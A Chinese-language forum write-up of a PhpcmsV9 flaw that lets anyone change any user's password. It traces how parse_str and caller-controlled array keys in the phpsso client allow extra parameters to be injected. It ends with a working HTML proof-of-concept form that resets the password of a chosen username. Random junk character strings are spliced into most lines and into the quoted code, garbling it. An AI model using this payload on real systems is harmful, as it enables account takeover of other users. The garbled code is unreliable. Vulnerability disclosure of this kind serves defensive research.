PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

admin

提到的通行证的代码：
, f5 [- n/ ^/ C" `% v
0 V3 J4 _+ M* u. g7 N/ P2 A9 T
' f' k* Q+ h( ]' eparse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);

5 x/ P. P  d4 ]) u9 Y4 C+ Q在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。

我把它留给了你们。
: L* H, @4 t4 k" y不知道你们发现了它没有。

我们知道parse_str类似将http请求转换成php变量的函数，所以，也像http请求在php的环境下一样，如果提交?a=sss&a=aaa，那么a的结果会是aaa，不是sss。

所以我们知道这个函数有一个问题了，如果后面提交一个内容，它会覆盖前面的。

( X' X$ }5 @: o5 H" m/ Y3 m也就是

username=zhangsan&username=lisi的话，那么用户名就不是zhangsan了。
) G( `3 H, O0 `7 _- B+ Q" d
* C9 G/ V" f, v* e要构造这样的请求，我们还是要回到通行证的client看看，我们有没有这样的机会。

# w# e  K5 f. I8 x7 f
2 h8 ]: m+ @  G! [! W9 E其实我们有这样的机会，看看代码，如下：
) M' O$ T* O: O. J+ ?. l
% }& m, N/ a" `" w* }. \
' u( J8 n. o) Y: spublic function auth_data($data) {
1 q; n) M- q0 V, L$ i3 ~- g' E3 m                $s = $sep = '';
+ p" z: ^9 M$ H- k# N" ^                foreach($data as $k => $v) {
2 b+ o0 d+ O$ q# ~. A+ |                        if(is_array($v)) {
4 V" \. }5 ]9 j8 l5 ]                                $s2 = $sep2 = '';
                                foreach($v as $k2 => $v2) {
                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
                                        $sep2 = '&';
0 n: [3 }% A" p! }% `' Y                                }
                                $s .= $sep.$s2;
& e  }  t* u( x2 R  b8 a                        } else {
5 q! f: ^; T1 m3 M! e                                $s .= "$sep$k=".$this->_ps_stripslashes($v);
4 J" t5 k- u$ j# \2 s9 L                        }
5 d5 ]  D* B+ l; m0 E, i                        $sep = '&';
                }
: J7 f. n& o4 z7 h) _
- o( _; |" `$ V- C+ a2 `( ]: ~" E                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
                return $auth_s;
        }
5 f; {! T, d  n8 N2 C9 G
# v/ \& N: a# s可能我没说明白，对，传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话，那么我就能重写这样的东西。
5 t9 ~0 y2 C  l. n! @
3 ?" N! O' B5 q0 p) A, F& M. ?举个例子

4 F* k/ X1 A6 ^& I7 @$a[aaa=a&bbb] = 'a';

, w  Y8 {% w6 v7 w& q5 d会变成aaa=a&bbb=a

明白了么，对，就是通过没有注意到的key，我们可以构造出多余的参数来。

' n' b4 b- E( ], }! y这个时候，我们可以再去看一个函数。
% P7 s+ Y- Y; K+ O6 B# ?
就在这个文件内：


public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
                if($email && !$this->_is_email($email)) {
+ f1 M, Z9 v) F) G7 W3 V) s2 g                        return -4;
                }
# B7 _: [  E# d                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
        }
/ L" X) q6 }' \: m" J7 _8 W
这是向通行证发了这样一个请求。
/ a- t; G( L3 c- w& X% l' J
我们再跟到通信证代码里去看看，就会有所发现。

- {2 e. G/ I  b, f
7 f# A- J$ m% U: `. A  hpublic function edit() {
* u  Z1 i  V. S; @4 E( ?//能省就省，太长了不是吗？
$ z* G2 ^4 O9 R: x1 e# L
, w6 A% d: ^  ?1 ^0 yif($this->username) {
( m' z, z8 |! a( J5 K: L//如果提交了用户名，则按照用户名修改记录，反之，按照uid来修改记录。
5 G: q- V6 f1 k, p9 l                                $res = $this->db->update($data, array('username'=>$this->username));
                        } else {
+ v9 l4 I0 K  z& C  }9 _0 X* ?                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);
                                $res = $this->db->update($data, array('uid'=>$this->uid));
                        }
0 s5 M  l- ~( S8 P7 z
好，我们知道了，如果提交了用户名，就会按照用户名来修改记录，不然就按照uid，我们看看函数结构：

; y+ m+ I/ w2 Hpublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')

很好，uid要是无法控制的话，后面只剩下一个random了，但是username就在第一个，只要email，password，newpassword，有任何一个可以控制，就可以修改密码了。

我当然找到了：
phpcms9/phpcms/modules/member/index.php

. Q0 }5 k. l$ ^" L: }$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
( Z9 I# ]8 Z$ }5 _
- Q+ j. E  z( r+ M1 r然后就没有然后了。
) o3 V' p$ U# W9 a6 ~' L
<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
+ k6 c' E3 q. ?. q0 W. i                                <table width="100%" cellspacing="0" class="table_form">
                                        <tr>
3 [6 r, d8 Q  R; ?: l7 E- w                                                <th width="80">邮箱：</th>        
! o- T" N" v+ n2 Y) |' N' L                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
7 B  S% `4 L- n! \" n0 F9 q                                        </tr>
* w6 f6 }& X! K! i% c2 X, Q                                        <tr>
* l# ^" i' ?  F3 t/ m                                                <th width="80">原密码：</th>        
! ?  u. n# d3 C& Q; O9 ]- f                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
( ~1 K; s, B# a5 m) S5 G7 Q9 J                                        </tr>
                                        <tr>
                                                <th>新密码：</th>
                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
; L) A; }# V+ l. G: s                                        </tr>
                                        <th></th>
                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
9 O$ [  R3 _- s4 I; [                                        </tr>
3 C" T. L. i+ U; j" a                                </table>
* l% ]- T* y3 P' {4 G
                               
& r' T! v3 j6 P& J. \* G                        </form>
2 L3 c  j8 f- C4 q- s